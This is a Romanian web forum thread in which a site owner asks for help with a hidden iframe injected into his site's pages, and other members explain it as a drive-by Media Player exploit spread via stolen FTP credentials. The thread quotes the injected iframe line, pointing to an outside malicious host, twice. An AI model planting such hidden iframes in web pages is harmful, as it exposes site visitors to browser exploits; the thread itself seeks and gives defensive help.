It is currently Sun Aug 01, 2010 2:28 am




Post new topic Reply to topic  [ 6 posts ] 
Script ciudat 
Author Message
New Member

Joined: Wed Aug 08, 2007 11:36 pm
Posts: 3
Post Script ciudat
Salutare tuturor. Am o mare problema. Pe site-ul meu am descoperit in codul sursa un script
Code:
<!-- ~ --><iframe src='http://crasher.biz/counter94/index.php' width='1' height='1' style='visibility: hidden;'></iframe><!-- ~ -->
NU DATI CLICK PE EL. asta a fost pe index. faza e ca daca intrai cu IE, iti facea praf windowsul. Cu Mozilla absolut nicio problema. L-am sters de pe indexul site-ului, apoi l-am descoperit peste 2-3 zile in indexul forumului si al albumului foto.

Stiti cumva ce e asta... cum pot sa scap de el?


Wed Aug 08, 2007 11:43 pm
Profile
Senior Member
User avatar

Joined: Fri Aug 03, 2007 10:57 am
Posts: 205
Location: Cluj
Post Re: Script ciudat
da ce site ai ? cine ti l-a facut ? nu putea sa apara pur si simplu acolo. sterge scriptu din pagina si gata.


Thu Aug 09, 2007 10:32 am
Profile
New Member

Joined: Wed Aug 08, 2007 11:36 pm
Posts: 3
Post Re: Script ciudat
pai asta e faza... ca l-am sters si el apare in continuare. site-ul este administrat de mine si de inca un baiat. nu pot sa inteleg care e faza.


Thu Aug 09, 2007 12:39 pm
Profile
Senior Member
User avatar

Joined: Fri Aug 03, 2007 10:57 am
Posts: 205
Location: Cluj
Post Re: Script ciudat
e un hack pt mediaplayer, face un buffer overflow. daca te uiti la script incarca un fisier cu mai mai mult de 255 caractere. si probabil MP10 (sau mai mic) pica in conditiile astea. eu am MP 11 si e okay si in IE si in FF, e doar un player la linkul ala.
probabil cineva ti-a hackat siteul, au gasit un security hole pe undeva (daca la albumu ala photo permiti userului sa uploadeze poze si nu validezi extensia fisierului uploadat, poate au uploadat un php care-l executa si-ti insereaza in index linia aia). da-mi mai multe detalii. da-mi linku la siteu tau.


Thu Aug 09, 2007 1:05 pm
Profile
V.I.P.
User avatar

Joined: Sat Jul 28, 2007 12:44 pm
Posts: 1091
Location: SkullBox
Post Re: Script ciudat
pikciu wrote:
Salutare tuturor. Am o mare problema. Pe site-ul meu am descoperit in codul sursa un script
Code:
<!-- ~ --><iframe src='http://crasher.biz/counter94/index.php' width='1' height='1' style='visibility: hidden;'></iframe><!-- ~ -->
NU DATI CLICK PE EL. asta a fost pe index. faza e ca daca intrai cu IE, iti facea praf windowsul. Cu Mozilla absolut nicio problema. L-am sters de pe indexul site-ului, apoi l-am descoperit peste 2-3 zile in indexul forumului si al albumului foto.

Stiti cumva ce e asta... cum pot sa scap de el?


Salvezi datele de conectare pe FTP in total commander ? De curand a aparut un script care citeste wcx_ftp.ini si se conecteaza pe conturi si modifica indexul. Am avut multi clienti care se plangeau de problema asta. Probabil e o varianta a virusului respectiv. Schimba parola si nu o mai salva in total commander. Vezi daca mai face la fel.

Bineinteles, scaneaza-ti si calculatorul cu un antivirus calumea ;)


Thu Aug 09, 2007 1:55 pm
Profile
New Member

Joined: Wed Aug 08, 2007 11:36 pm
Posts: 3
Post Re: Script ciudat
cred ca asta e... am schimbat parola. acum cel mai bine e sa folosesc pentru upload un program ca FTP Manager?


Fri Aug 10, 2007 11:35 am
Profile
 
Post new topic Reply to topic  [ 6 posts ] 


Who is online

Users browsing this forum: No registered users and 4 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
Powered by phpBB © phpBB Group.
Designed by boogiesbc and Vjacheslav Trushkin .